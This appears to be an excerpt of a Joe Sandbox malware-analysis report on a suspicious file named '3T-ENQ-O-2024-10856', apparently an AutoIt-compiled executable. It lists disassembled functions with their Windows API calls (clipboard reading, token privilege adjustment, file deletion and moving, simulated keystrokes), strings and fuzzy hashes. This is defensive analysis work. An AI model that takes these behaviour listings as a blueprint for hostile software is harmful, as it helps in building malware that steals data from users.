                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __getptd_noexit$___lock_fhandle
                                • String ID:
                                • API String ID: 1144279405-0
                                • Opcode ID: 2b27d1ff3d50c4331b55af42caf99fb9e69595f428d18733fd5f155b6d94ecbb
                                • Instruction ID: d48b77d9ceeab55aa29d46d17c3d58cb135b7f9ae4d3c3b26cfafbbce2aeefdf
                                • Opcode Fuzzy Hash: 2b27d1ff3d50c4331b55af42caf99fb9e69595f428d18733fd5f155b6d94ecbb
                                • Instruction Fuzzy Hash: 0411C132805614AFD722BF64CC463597A606F4133DF990341E4740F2EADBB49D41AB69
                                APIs
                                • __lock_file.LIBCMT ref: 00C8377D
                                  • Part of subcall function 00C8889E: __getptd_noexit.LIBCMT ref: 00C8889E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __getptd_noexit__lock_file
                                • String ID:
                                • API String ID: 2597487223-0
                                • Opcode ID: c4ad1da57f7910b8705bff1b0c9041f8b758b38dd4adfc235c202aa4a0b385ac
                                • Instruction ID: fc14c8af871a5a7feba12ce86be69bf3626900b09288377b0d717b5bdcf5f249
                                • Opcode Fuzzy Hash: c4ad1da57f7910b8705bff1b0c9041f8b758b38dd4adfc235c202aa4a0b385ac
                                • Instruction Fuzzy Hash: 57F096B1500245EBDF21BF748D067DE7660AF01718F145614F4249A1D1E779CB50FB99
                                APIs
                                • FreeLibrary.KERNEL32(?,?,?,?,?,00C634E2,?,00000001), ref: 00C63E6D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: 781dc9a3de78bf9c976dfae2bf4d472457e428546183d682f97e9533d85c11db
                                • Instruction ID: 44e43ba4d1194089d8187e5aaf9a09eb6427ebec0ad9a64a466cbd383a92eb35
                                • Opcode Fuzzy Hash: 781dc9a3de78bf9c976dfae2bf4d472457e428546183d682f97e9533d85c11db
                                • Instruction Fuzzy Hash: 26F039B5105792CFCB349F65D4D0856BBE0AF057293248A3EE1E682621C7339A44DF20
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                • Instruction ID: c449e1d71d59e1d7dfecf329eb4ec238e316998d9796f5a914521242831e03f3
                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                • Instruction Fuzzy Hash: CC31D371A00106ABC718DF59D4C0A69FBA6FB49310B24C2A9E55ECB255DB31EEC2DBD0
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366580328.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_3390000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                • Instruction ID: 8a9e70e5a3a23992e8332fbe1d1c9cfb470b45af31cb4dd2cd52481b7af9f838
                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                • Instruction Fuzzy Hash: 09E0E67494010EEFDB00EFB8D54969E7FB4EF04301F1005A1FD01D2280D6319D508A72
                                APIs
                                  • Part of subcall function 00C7AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00C7AF8E
                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00CCF64E
                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CCF6AD
                                • GetWindowLongW.USER32(?,000000F0), ref: 00CCF6EA
                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CCF711
                                • SendMessageW.USER32 ref: 00CCF737
                                • _wcsncpy.LIBCMT ref: 00CCF7A3
                                • GetKeyState.USER32(00000011), ref: 00CCF7C4
                                • GetKeyState.USER32(00000009), ref: 00CCF7D1
                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CCF7E7
                                • GetKeyState.USER32(00000010), ref: 00CCF7F1
                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CCF820
                                • SendMessageW.USER32 ref: 00CCF843
                                • SendMessageW.USER32(?,00001030,?,00CCDE69), ref: 00CCF940
                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00CCF956
                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00CCF967
                                • SetCapture.USER32(?), ref: 00CCF970
                                • ClientToScreen.USER32(?,?), ref: 00CCF9D4
                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00CCF9E0
                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00CCF9FA
                                • ReleaseCapture.USER32 ref: 00CCFA05
                                • GetCursorPos.USER32(?), ref: 00CCFA3A
                                • ScreenToClient.USER32(?,?), ref: 00CCFA47
                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CCFAA9
                                • SendMessageW.USER32 ref: 00CCFAD3
                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CCFB12
                                • SendMessageW.USER32 ref: 00CCFB3D
                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00CCFB55
                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00CCFB60
                                • GetCursorPos.USER32(?), ref: 00CCFB81
                                • ScreenToClient.USER32(?,?), ref: 00CCFB8E
                                • GetParent.USER32(?), ref: 00CCFBAA
                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CCFC10
                                • SendMessageW.USER32 ref: 00CCFC40
                                • ClientToScreen.USER32(?,?), ref: 00CCFC96
                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00CCFCC2
                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CCFCEA
                                • SendMessageW.USER32 ref: 00CCFD0D
                                • ClientToScreen.USER32(?,?), ref: 00CCFD57
                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00CCFD87
                                • GetWindowLongW.USER32(?,000000F0), ref: 00CCFE1C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                • String ID: @GUI_DRAGID$F
                                • API String ID: 2516578528-4164748364
                                • Opcode ID: e630032cc8870a8669ec334aad6028a2977c37b53448e7bdb1518b031f7a47d9
                                • Instruction ID: 30c038d19db54e46a41ceb50de5688def9c12e2d671cc4cf857741618061d1a0
                                • Opcode Fuzzy Hash: e630032cc8870a8669ec334aad6028a2977c37b53448e7bdb1518b031f7a47d9
                                • Instruction Fuzzy Hash: 05329A74204245AFDB20DF64C884FAABBEABF48314F144A2DF6A6872B1D731DD42DB51
                                APIs
                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00CCAFDB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: %d/%02d/%02d
                                • API String ID: 3850602802-328681919
                                • Opcode ID: a1cc2fda11cd4fb082faf248eb838426fb9ed68ceffaf44d7f3f0b851a5f4c5f
                                • Instruction ID: 61263beb03dcebc01c393cdb9afdc885abcb947b97c85ba5f6ab3597261e50b9
                                • Opcode Fuzzy Hash: a1cc2fda11cd4fb082faf248eb838426fb9ed68ceffaf44d7f3f0b851a5f4c5f
                                • Instruction Fuzzy Hash: DA12CFB1500248ABEB259F65CC8DFAE7BB8EF45318F10421DF526EB2D0DB718A41DB52
                                APIs
                                • GetForegroundWindow.USER32(00000000,00000000), ref: 00C7F796
                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CD4388
                                • IsIconic.USER32(000000FF), ref: 00CD4391
                                • ShowWindow.USER32(000000FF,00000009), ref: 00CD439E
                                • SetForegroundWindow.USER32(000000FF), ref: 00CD43A8
                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00CD43BE
                                • GetCurrentThreadId.KERNEL32 ref: 00CD43C5
                                • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00CD43D1
                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00CD43E2
                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00CD43EA
                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 00CD43F2
                                • SetForegroundWindow.USER32(000000FF), ref: 00CD43F5
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CD440A
                                • keybd_event.USER32(00000012,00000000), ref: 00CD4415
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CD441F
                                • keybd_event.USER32(00000012,00000000), ref: 00CD4424
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CD442D
                                • keybd_event.USER32(00000012,00000000), ref: 00CD4432
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CD443C
                                • keybd_event.USER32(00000012,00000000), ref: 00CD4441
                                • SetForegroundWindow.USER32(000000FF), ref: 00CD4444
                                • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00CD446B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                • String ID: Shell_TrayWnd
                                • API String ID: 4125248594-2988720461
                                • Opcode ID: 58e44c8ca9e2bb786547b586e69fcd737eba08639fffb34feb5cf40527ade5c6
                                • Instruction ID: ea47635c33e6392db8948f90e1aea2c4677f5b12a65872c6dd3a0b17009bd365
                                • Opcode Fuzzy Hash: 58e44c8ca9e2bb786547b586e69fcd737eba08639fffb34feb5cf40527ade5c6
                                • Instruction Fuzzy Hash: 0D3163B1A40358BFEB216B759C8AF7F7E6CEB44B50F104016FB05EA2D0C6B15D41AEA0
                                APIs
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00D222E8,?,00000000,?,00C63E2E,?,00000000,?,00CFDBF0,00000000,?), ref: 00C6BE8B
                                • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00C63E2E,?,00000000,?,00CFDBF0,00000000,?,00000002), ref: 00C6BEA7
                                • __wsplitpath.LIBCMT ref: 00C6BF19
                                  • Part of subcall function 00C8297D: __wsplitpath_helper.LIBCMT ref: 00C829BD
                                • _wcscpy.LIBCMT ref: 00C6BF31
                                • _wcscat.LIBCMT ref: 00C6BF46
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00C6BF56
                                • _wcscpy.LIBCMT ref: 00C6C03E
                                • _wcscpy.LIBCMT ref: 00C6C1ED
                                • SetCurrentDirectoryW.KERNEL32 ref: 00C6C250
                                  • Part of subcall function 00C8010A: std::exception::exception.LIBCMT ref: 00C8013E
                                  • Part of subcall function 00C8010A: __CxxThrowException@8.LIBCMT ref: 00C80153
                                  • Part of subcall function 00C6C320: _memmove.LIBCMT ref: 00C6C419
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string$_
                                • API String ID: 2542276039-689609797
                                • Opcode ID: 697e0fcdbd730264a717fa82a31bb75805d2d202e84c71c9a1ddd2aa688e4313
                                • Instruction ID: 884d2d0db1f0725deb412633fa90023ddc256c410e927f92a2f4aa46002dd22f
                                • Opcode Fuzzy Hash: 697e0fcdbd730264a717fa82a31bb75805d2d202e84c71c9a1ddd2aa688e4313
                                • Instruction Fuzzy Hash: 2642A0715083459FD720EF60C891BAFB7E8AF85304F04492EF99687252DB31EA49DB93
                                APIs
                                  • Part of subcall function 00C9BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C9BF0F
                                  • Part of subcall function 00C9BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C9BF3C
                                  • Part of subcall function 00C9BEC3: GetLastError.KERNEL32 ref: 00C9BF49
                                • _memset.LIBCMT ref: 00C9BA34
                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00C9BA86
                                • CloseHandle.KERNEL32(?), ref: 00C9BA97
                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C9BAAE
                                • GetProcessWindowStation.USER32 ref: 00C9BAC7
                                • SetProcessWindowStation.USER32(00000000), ref: 00C9BAD1
                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C9BAEB
                                  • Part of subcall function 00C9B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C9B9EC), ref: 00C9B8C5
                                  • Part of subcall function 00C9B8B0: CloseHandle.KERNEL32(?,?,00C9B9EC), ref: 00C9B8D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                • String ID: $default$winsta0
                                • API String ID: 2063423040-1027155976
                                • Opcode ID: a69466da578546b86a4ec0eacc23798168829a4a1d65d18fd828b0edb4cc5d62
                                • Instruction ID: 36902d8dd73981e858f6cec39384a014af356b6bd3227d225b9ad5b839004295
                                • Opcode Fuzzy Hash: a69466da578546b86a4ec0eacc23798168829a4a1d65d18fd828b0edb4cc5d62
                                • Instruction Fuzzy Hash: 62817C71800249BFDF11DFA4EE89AEEBBB9FF08304F144519F925A6160DB318E55EB20
                                APIs
                                  • Part of subcall function 00C631B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00C631DA
                                  • Part of subcall function 00CA7B9F: __wsplitpath.LIBCMT ref: 00CA7BBC
                                  • Part of subcall function 00CA7B9F: __wsplitpath.LIBCMT ref: 00CA7BCF
                                  • Part of subcall function 00CA7C0C: GetFileAttributesW.KERNEL32(?,00CA6A7B), ref: 00CA7C0D
                                • _wcscat.LIBCMT ref: 00CA6B9D
                                • _wcscat.LIBCMT ref: 00CA6BBB
                                • __wsplitpath.LIBCMT ref: 00CA6BE2
                                • FindFirstFileW.KERNEL32(?,?), ref: 00CA6BF8
                                • _wcscpy.LIBCMT ref: 00CA6C57
                                • _wcscat.LIBCMT ref: 00CA6C6A
                                • _wcscat.LIBCMT ref: 00CA6C7D
                                • lstrcmpiW.KERNEL32(?,?), ref: 00CA6CAB
                                • DeleteFileW.KERNEL32(?), ref: 00CA6CBC
                                • MoveFileW.KERNEL32(?,?), ref: 00CA6CDB
                                • MoveFileW.KERNEL32(?,?), ref: 00CA6CEA
                                • CopyFileW.KERNEL32(?,?,00000000), ref: 00CA6CFF
                                • DeleteFileW.KERNEL32(?), ref: 00CA6D10
                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CA6D37
                                • FindClose.KERNEL32(00000000), ref: 00CA6D53
                                • FindClose.KERNEL32(00000000), ref: 00CA6D61
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                • String ID: \*.*
                                • API String ID: 1867810238-1173974218
                                • Opcode ID: 5e32144bcc2a96c5a01d219ee502e6fe816dcd679352f2f1bfabb74c96ca72ec
                                • Instruction ID: 6993b045ed1a7428c2e88044267abe21a834a4716394a3bfc97536e2f54f312c
                                • Opcode Fuzzy Hash: 5e32144bcc2a96c5a01d219ee502e6fe816dcd679352f2f1bfabb74c96ca72ec
                                • Instruction Fuzzy Hash: C651407290015DAACB21EBA0DC85FDE77BCAF06318F0845D6E55AA7041DB349B89CF61
                                APIs
                                • OpenClipboard.USER32(00CFDBF0), ref: 00CB70C3
                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 00CB70D1
                                • GetClipboardData.USER32(0000000D), ref: 00CB70D9
                                • CloseClipboard.USER32 ref: 00CB70E5
                                • GlobalLock.KERNEL32(00000000), ref: 00CB7101
                                • CloseClipboard.USER32 ref: 00CB710B
                                • GlobalUnlock.KERNEL32(00000000), ref: 00CB7120
                                • IsClipboardFormatAvailable.USER32(00000001), ref: 00CB712D
                                • GetClipboardData.USER32(00000001), ref: 00CB7135
                                • GlobalLock.KERNEL32(00000000), ref: 00CB7142
                                • GlobalUnlock.KERNEL32(00000000), ref: 00CB7176
                                • CloseClipboard.USER32 ref: 00CB7283
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                • String ID:
                                • API String ID: 3222323430-0
                                • Opcode ID: 55f452e04bd1086b89c287aa8d15596c43228bd93111c041abb9c1f1966dfaf9
                                • Instruction ID: 22a9f6f6fab43e0230090f324ba0a475b1c599f3b6568aa82a003dd431f959ac
                                • Opcode Fuzzy Hash: 55f452e04bd1086b89c287aa8d15596c43228bd93111c041abb9c1f1966dfaf9
                                • Instruction Fuzzy Hash: 7551A231208341ABD710EF64DCDAFAE77A8AF84B01F004619FA57DA1D1DB71DD05AB62
                                APIs
                                • FindFirstFileW.KERNEL32(?,?), ref: 00CAFE03
                                • FindClose.KERNEL32(00000000), ref: 00CAFE57
                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CAFE7C
                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CAFE93
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CAFEBA
                                • __swprintf.LIBCMT ref: 00CAFF06
                                • __swprintf.LIBCMT ref: 00CAFF3F
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • __swprintf.LIBCMT ref: 00CAFF93
                                  • Part of subcall function 00C8234B: __woutput_l.LIBCMT ref: 00C823A4
                                • __swprintf.LIBCMT ref: 00CAFFE1
                                • __swprintf.LIBCMT ref: 00CB0030
                                • __swprintf.LIBCMT ref: 00CB007F
                                • __swprintf.LIBCMT ref: 00CB00CE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                • API String ID: 108614129-2428617273
                                • Opcode ID: eba72f7ab813853e8ceaf6c4609693d742871438ef252c65cb609884908bb54c
                                • Instruction ID: 8ef4f42375d0fd9058cf5a816b9549c34223e634a5e246ed0f7e5cca05f5cdb9
                                • Opcode Fuzzy Hash: eba72f7ab813853e8ceaf6c4609693d742871438ef252c65cb609884908bb54c
                                • Instruction Fuzzy Hash: 6AA13FB2408344ABC310EFA4CC95DAFB7ECAF98704F44491DF595C6152EB34EA49DBA2
                                APIs
                                • FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00CB2065
                                • _wcscmp.LIBCMT ref: 00CB207A
                                • _wcscmp.LIBCMT ref: 00CB2091
                                • GetFileAttributesW.KERNEL32(?), ref: 00CB20A3
                                • SetFileAttributesW.KERNEL32(?,?), ref: 00CB20BD
                                • FindNextFileW.KERNEL32(00000000,?), ref: 00CB20D5
                                • FindClose.KERNEL32(00000000), ref: 00CB20E0
                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00CB20FC
                                • _wcscmp.LIBCMT ref: 00CB2123
                                • _wcscmp.LIBCMT ref: 00CB213A
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00CB214C
                                • SetCurrentDirectoryW.KERNEL32(00D13A68), ref: 00CB216A
                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CB2174
                                • FindClose.KERNEL32(00000000), ref: 00CB2181
                                • FindClose.KERNEL32(00000000), ref: 00CB2191
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                • String ID: *.*
                                • API String ID: 1803514871-438819550
                                • Opcode ID: 6cfb0d5e11c427db48a614cad029270ccb500fe78d8237000ca353ee99555b82
                                • Instruction ID: a5255a0209c469bc885b1e0369d05bfbc6ae77ae955d84c6625341e3eb4696f1
                                • Opcode Fuzzy Hash: 6cfb0d5e11c427db48a614cad029270ccb500fe78d8237000ca353ee99555b82
                                • Instruction Fuzzy Hash: B231A0725002197ECB24EBA8EC89FDE77AC9F05360F104166E921E6090DB70DF94DB65
                                APIs
                                • FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00CB21C0
                                • _wcscmp.LIBCMT ref: 00CB21D5
                                • _wcscmp.LIBCMT ref: 00CB21EC
                                  • Part of subcall function 00CA7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00CA7621
                                • FindNextFileW.KERNEL32(00000000,?), ref: 00CB221B
                                • FindClose.KERNEL32(00000000), ref: 00CB2226
                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00CB2242
                                • _wcscmp.LIBCMT ref: 00CB2269
                                • _wcscmp.LIBCMT ref: 00CB2280
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00CB2292
                                • SetCurrentDirectoryW.KERNEL32(00D13A68), ref: 00CB22B0
                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CB22BA
                                • FindClose.KERNEL32(00000000), ref: 00CB22C7
                                • FindClose.KERNEL32(00000000), ref: 00CB22D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                • String ID: *.*
                                • API String ID: 1824444939-438819550
                                • Opcode ID: c4b1bfde9efc953bdd1a4c5ff3c912557c0da7ddf7ae9841657a9dd9dada6590
                                • Instruction ID: c59a4445a52fd61231374b61a86b886cd2b4794676cff2f39484887f91b68d67
                                • Opcode Fuzzy Hash: c4b1bfde9efc953bdd1a4c5ff3c912557c0da7ddf7ae9841657a9dd9dada6590
                                • Instruction Fuzzy Hash: AC319E7290121A7ECF24AFA4EC49FEE77AC9F45334F100165E821E6090DB70DF95DA6A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memmove_memset
                                • String ID: Q\E$[$\$\$\$]$^
                                • API String ID: 3555123492-286096704
                                • Opcode ID: bfa0b416b3d3f60a982ffd225e6e854e230d0e51a1481031a070d86ca3c132a5
                                • Instruction ID: 48a29e0a9117c871fae1b8599e99e5f2c939a38d72e123ac9da9e51503eac40e
                                • Opcode Fuzzy Hash: bfa0b416b3d3f60a982ffd225e6e854e230d0e51a1481031a070d86ca3c132a5
                                • Instruction Fuzzy Hash: 4B72BF71E04259DBDF24CF99C8806EDB7B1FF44314F2482A9D865AB381E774AE81DB90
                                APIs
                                  • Part of subcall function 00C9B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00C9B903
